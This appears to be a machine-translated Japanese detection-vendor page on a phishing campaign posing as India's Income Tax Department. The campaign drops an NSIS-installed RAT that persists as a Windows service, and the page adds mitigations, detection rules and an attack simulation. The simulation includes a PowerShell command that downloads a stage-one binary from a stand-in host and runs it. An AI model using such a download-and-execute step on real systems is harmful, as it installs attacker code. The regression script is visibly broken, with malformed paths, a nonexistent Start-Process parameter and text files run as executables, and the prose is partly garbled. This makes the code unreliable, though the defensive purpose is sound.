フィッシングキャンペーンがインドの所得税を装い企業を標的にする
Detection stack
- AIDR
- Alert
- ETL
- Query
概要
インドの所得税庁を装ったフィッシング作戦が、罠が仕掛けられたPDFを届け、受け手を偽のコンプライアンス・ポータルに誘導します。サイトは被害者に対し、署名されたNSISインストーラを含むZIPパッケージをダウンロードするよう促し、これが複数段階のリモートアクセス型トロイの木馬を展開します。RATはWindowsサービスを作成して持続し、非標準ポートで複数のC2サーバーと通信します。
調査
研究者は、PDFルアー、埋め込まれたURL、および連鎖したNSISインストーラのワークフローを分析しました。ディスクにドロップされたバイナリ、隠されたインストールフォルダの作成、およびの登録を文書化しました。 NSecRTS.exe をWindowsサービスとして。記事はまた、3つのIPアドレスへの外向き通信と、配信チェーン全体で署名されたペイロードの使用を明らかにしました。
緩和策
境界とプロキシコントロールを通じて悪意のあるドメインおよび関連するIPアドレスをブロックします。税金をテーマにした添付ファイルや偽装されたコンプライアンス・ポータルに誘導するリンクをフラグするために、メール保護を強化します。可能であれば、信頼されていないインストーラの自動実行を防ぎ、特に「Windows Real-time Protection Service」という名前のサービス作成に注意を払いましょう。 「Windows Real-time Protection Service」。
対応策
感染チェーンに関連するリストされたファイル名、ハッシュ、およびWindowsサービス登録アクティビティをアラートします。影響を受けたエンドポイントを隔離し、メモリとディスクイメージを取得し、追加のRAT段階やツールを特定するためにフルフォレンジックを実施します。永続性アーティファクトを削除し、再侵入を防ぐために潜在的に露出した資格情報をリセットします。
攻撃フロー
検出
怪しいコマンド&コントロールによる非標準トップレベルドメイン(TLD)のDNS要求(via dns)
表示
IOC(DestinationIP)を検出する: インドの所得税をテーマにしたフィッシングキャンペーンが地元企業を標的に
表示
IOC(SourceIP)を検出する: インドの所得税をテーマにしたフィッシングキャンペーンが地元企業を標的に
表示
IOC(HashMd5)を検出する: インドの所得税をテーマにしたフィッシングキャンペーンが地元企業を標的に
表示
インドの所得税をテーマにしたフィッシングキャンペーンにおけるマルウェア実行の検出【Windows プロセス作成】
表示
NSecRTS.exeのC2通信の検出【Windows ネットワーク接続】
表示
シミュレーション実行
前提条件: テレメトリー&ベースラインのプレ・フライトチェックが合格している必要があります。
根拠: このセクションでは、検出ルールをトリガーするためにデザインされた攻撃者のテクニック(TTP)の正確な実行を詳細に説明します。コマンドとナarrativesは識別されたTTPを直接に反映し、検出ロジックによって期待される正確なテレメトリーを生成することを目的としています。
-
攻撃の物語とコマンド:
攻撃者が「所得税通知」というタイトルのフィッシングメールを送信します。添付ファイルは悪意のあるWord文書で、次をドロップしますsetup_Ir5swQ3EpeuBpePEpew=.exeto%TEMP%。被害者がファイルを実行すると、それは次を生成しますSibuia.exe(真のペイロード)を自分の子として。この子親のチェーンは一般的なプロセス作成アラートを回避するようデザインされていますが、Sigmaルールによってキャッチされます。侵害されたホストで実行されたステップ:
- 第一段階バイナリをドロップする:
$stage1 = "$env:TEMPsetup_Ir5swQ3EpeuBpePEpew=.exe" Invoke-WebRequest -Uri "http://malicious.example.com/stage1" -OutFile $stage1 - 第一段階バイナリを実行する:
Start-Process -FilePath $stage1 -NoNewWindow - 第一段階バイナリが内部で第二段階バイナリを同じディレクトリに作成して起動します:
Sibuia.exe(以下のテストスクリプトでシミュレートします。) (以下のテストスクリプトでシミュレートします。)
- 第一段階バイナリをドロップする:
-
回帰テストスクリプト:
以下のスクリプトは、ルールをトリガーするのに必要な正確な親子関係を再現します。# ------------------------------------------------- # インド所得税フィッシングチェーンのシミュレーション # ------------------------------------------------- # パスを定義 $stage1 = "$env:TEMPsetup_Ir5swQ3EpeuBpePEpew=.exe" $stage2 = "$env:TEMPSibuia.exe" # ダミーバイナリを作成(ゼロバイト – Sysmonログに十分) Set-Content -Path $stage1 -Value 'REM stage1 placeholder' -Encoding ASCII Set-Content -Path $stage2 -Value 'REM stage2 placeholder' -Encoding ASCII # ファイルが実行可能であることを確認(Windowsにはchmodが不要) Write-Host "[*] Stage1を開始します..." $proc1 = Start-Process -FilePath $stage1 -PassThru # stage1がstage2を“生成”するのに瞬間を与える(直接起動でシミュレート) Start-Sleep -Milliseconds 500 Write-Host "[*] stage1がstage2 (Sibuia.exe)を生成中..." $proc2 = Start-Process -FilePath $stage2 -PassThru -Parent $proc1.Id Write-Host "[+] シミュレーション完了。SIEMでの検出を確認してください。" # ------------------------------------------------- -
クリーンアップコマンド:
アーティファクトを削除し、残存するプロセスを終了します。# 残ったプロセスを停止 Get-Process -Name "setup_Ir5swQ3EpeuBpePEpew=" -ErrorAction SilentlyContinue | Stop-Process -Force Get-Process -Name "Sibuia" -ErrorAction SilentlyContinue | Stop-Process -Force # ファイルを削除 Remove-Item -Path "$env:TEMPsetup_Ir5swQ3EpeuBpePEpew=.exe" -Force -ErrorAction SilentlyContinue Remove-Item -Path "$env:TEMPSibuia.exe" -Force -ErrorAction SilentlyContinue Write-Host "[*] クリーンアップ完了。"